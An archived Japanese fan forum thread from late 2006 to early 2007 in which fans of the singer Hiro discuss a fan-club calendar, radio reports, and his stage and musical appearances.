328 :NO MUSIC NO NAME:2006/12/16(土) 07:21:57 ID:q5beT24f
>>327
おまいさん、同郷ジャマイカ…
静岡は東名の人もきやすいから、来ますよ!…
と言ってみるテスト

329 :NO MUSIC NO NAME:2006/12/16(土) 22:24:21 ID:IhoxNA8A
今HDDからキコキコと音がしたよ保守

330 :NO MUSIC NO NAME:2006/12/17(日) 23:55:53 ID:SDQK4v9f
…なんでココは常に静かなんだ?
ファソもヒロと同じように機械苦手なの???

331 :NO MUSIC NO NAME:2006/12/18(月) 01:07:23 ID:83DZf7Ms
誰かラジオレポでもしてくれんかのう…

332 :NO MUSIC NO NAME:2006/12/18(月) 01:32:53 ID:oKuWgqoF
ミニアルバムの話は来週してくれるらしいです。
以上ラジオレポ。

333 :NO MUSIC NO NAME:2006/12/21(木) 18:43:46 ID:vJ+52Mtl
誰もいないね…

もうチケとカレンダーが届いた人、いるのかな?

334 :NO MUSIC NO NAME:2006/12/21(木) 22:10:55 ID:tL+npR2s
さっきカレンダーきた!!
やっぱりヒロタン大好き(^-^)!!

335 :NO MUSIC NO NAME:2006/12/21(木) 23:07:37 ID:umQgUYQi
若返ったヒロタソにびっくりw

336 :NO MUSIC NO NAME:2006/12/22(金) 11:36:35 ID:qg3tUbkP
今年のカレンダーはさすがにもう買えないよね?

337 :NO MUSIC NO NAME:2006/12/22(金) 13:46:55 ID:I7Ij6Wns
電話して聞いてみ
在庫があれば売ってくれると思うよ

338 :NO MUSIC NO NAME:2006/12/22(金) 21:40:56 ID:MwPpC0P0
こんな変なカレンダー、ジャイアンツカレンダー以来だ

339 :NO MUSIC NO NAME:2006/12/24(日) 09:32:56 ID:8yo66BVd
また舞台か…w
事務所移籍してからこればっかりだな
頑張るはヒロを舞台役者にしたいのか

340 :NO MUSIC NO NAME:2006/12/25(月) 09:14:06 ID:jRgbqAOT
やったあ!
地方公演もある!!
見に行こう〜

341 :NO MUSIC NO NAME:2006/12/25(月) 18:53:54 ID:kawCh0YQ
もう舞台なんて…と思ってたが
共演者を見てちょっと行きたくなってる自分がいる

342 :NO MUSIC NO NAME:2006/12/26(火) 00:16:36 ID:1ZPe5RyL
俺は逆に、共演者をみて行くのをやめようかとおもった…


343 :NO MUSIC NO NAME:2006/12/26(火) 08:57:49 ID:OTeUZIef
舞台はどうなの?
ライブが好きな自分は行く気がしなくて一回も行ったことがない

344 :NO MUSIC NO NAME:2006/12/26(火) 22:55:47 ID:XO2UoGKq
343〉オマイは俺か!
歌ってないヒロタソははがゆくてな。


345 :NO MUSIC NO NAME:2006/12/27(水) 02:53:12 ID:IeHDXAb5
ミュージカルでは歌ってるよ
CD不況だから舞台の仕事も仕方ないと思う

346 :NO MUSIC NO NAME:2006/12/27(水) 09:24:29 ID:7rZNyH9f
歌ってるな…スマソ

ミュージカルをやってスキルが上がってるのは実感してるんだけど、いっしょくたには考えられない。

頭カタイのかなぁ
食わず嫌いなのかなぁ

347 :NO MUSIC NO NAME:2006/12/27(水) 09:37:24 ID:NSGxfrJy
食わず嫌いをやめろとは言わんが自分は食ってみたら意外とうまかった派だw
どうするかは自分次第

348 :NO MUSIC NO NAME:2006/12/27(水) 17:46:44 ID:6hfvW8yk
自分もそうだな>食ったらうまかった
クラリはかなり個人的に良かったし、ジャックブレルも思いのほか楽しめた
ヒロを応援する(w意味で行ってみたけど、行って良かったと思えたよ

349 :NO MUSIC NO NAME:2006/12/27(水) 18:23:45 ID:CEWnqoHG
持ち歌でのライブ感とはまた違うけど
ミュージカルものは歌うたいとしてのヒロタンの別の一面も見れるから自分も結構楽しんでる
まぁ生で会うならフルライブで完全燃焼が至上だと言ったらそれまでだが

今度の動物園物語は全編ストレートプレイだがどう転ぶかな




350 :NO MUSIC NO NAME:2006/12/27(水) 19:28:03 ID:7rZNyH9f
346です。レストン!

以外とうまかった←まだまだいそうだな。
地方公演あったら行ってみようかなと思ったよ。

351 :NO MUSIC NO NAME:2006/12/28(木) 01:20:47 ID:5HLpHxjW
芝居のヒロのほうが好きな少数派
accessのヒロみたいに決め決めじゃなくて
格好つけたくてもつけられない必死なヒロがいいです


352 :NO MUSIC NO NAME:2006/12/28(木) 02:02:45 ID:QsRY2xbu
たまには格好つけさせてあげてくださいw

353 :NO MUSIC NO NAME:2006/12/28(木) 23:22:02 ID:eVxax1i/
地方講演てどこぞや?教えて(^-^)

354 :NO MUSIC NO NAME:2006/12/28(木) 23:28:40 ID:Spsc9UZW
ググレ

教えてチャン鵜挫杉

355 :NO MUSIC NO NAME:2006/12/29(金) 00:59:27 ID:H67qj+UA
最近相方と兼スレにもおかしなのが湧いてるな


356 :NO MUSIC NO NAME:2006/12/29(金) 19:55:28 ID:x1BU5J2x
あの髪型で舞台やるのかなー
今までのがよかったのになー

357 :NO MUSIC NO NAME:2006/12/31(日) 09:44:16 ID:i4NgEbty
毎日新聞にちっちゃいけど舞台記事キタ──


初めてだから嬉しいぞ

358 :NO MUSIC NO NAME:2006/12/31(日) 12:20:20 ID:SrQEagDu
>357
今朝の毎日新聞?

359 :NO MUSIC NO NAME:2007/01/01(月) 00:24:45 ID:1i1+qRN4
あけおめ!相変わらず人いないねー!

360 :NO MUSIC NO NAME:2007/01/03(水) 01:19:08 ID:t+4PMBmf
そろそろ演劇板あたりに
スレつくったほうがいい気ガス

361 :NO MUSIC NO NAME:2007/01/03(水) 02:33:08 ID:hUbh6A8c
いらねぇwwwww

362 :NO MUSIC NO NAME:2007/01/03(水) 18:25:25 ID:Z0tvwoC6
それより、初心者パソコン講座で作ったような
あけおめカードにツッこまなくていいのか?

363 :NO MUSIC NO NAME:2007/01/03(水) 18:59:44 ID:1NwQbP1z
チープだよなw
何年も会報冊子を作ってるとは思えんw

364 :360:2007/01/03(水) 21:23:18 ID:lQIfjCn7
>361
方角から引越しろってことだよ
どうせ灰汁か舞台の話題しかないんだからw

365 :NO MUSIC NO NAME:2007/01/03(水) 22:19:12 ID:D0pVQ9oJ
引っ越すにしても演劇板に行こうものなら叩かれるんじゃないか?w
事務所の力で役者の仕事もらってるだけなんだから
360がこのスレを不要だと思うなら演劇板にスレ立てても構わんが
自分はここを保守して使うよw

366 :NO MUSIC NO NAME:2007/01/03(水) 23:53:30 ID:Z0tvwoC6
自分もここのをこのまま使いたい。

367 :NO MUSIC NO NAME:2007/01/04(木) 12:13:30 ID:oij8Ci4E
ノシ

368 :ヒーロー:2007/01/05(金) 04:00:26 ID:TwSd1K2J
初めてスキャブルPV診たケド

アレ演技じゃないね。。。痔だよ絶対に。



369 :NO MUSIC NO NAME:2007/01/05(金) 09:29:45 ID:oEojLvv9
痔なのΣ

370 :ヒーロー:2007/01/05(金) 19:24:06 ID:t++KsJ6C
PV相手の方って

仮眠具アウトした人でしょ?確か?

371 :NO MUSIC NO NAME:2007/01/06(土) 20:49:15 ID:XOiWPkYe
ヒロってお気楽ノーテンキにしか見えないんだけど
参ってた時期もあるんだ?
売れなくてやさぐれてたってこと?

372 :NO MUSIC NO NAME:2007/01/07(日) 17:38:58 ID:ZdiyZaE1
>371
壁の時期

373 :NO MUSIC NO NAME:2007/01/08(月) 17:45:18 ID:tDF/deu6
動物園のおサルさんの様子は如何でしたか?

374 :NO MUSIC NO NAME:2007/01/09(火) 09:37:13 ID:9Atz/Bb4
よかったみたいだね
楽しみだ

375 :NO MUSIC NO NAME:2007/01/09(火) 21:07:40 ID:+2t9LuQq
今日初めて見たけどマジでいいよ。見といて損なし。

376 :NO MUSIC NO NAME:2007/01/10(水) 01:06:44 ID:WDLePNHU
クラリとこっちどっちが良い?

377 :NO MUSIC NO NAME:2007/01/10(水) 09:05:59 ID:b02KHXnT
物語の解りやすさと席の近さwでは動物園が上。
歌モノを求めるならオススメしない。

61 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)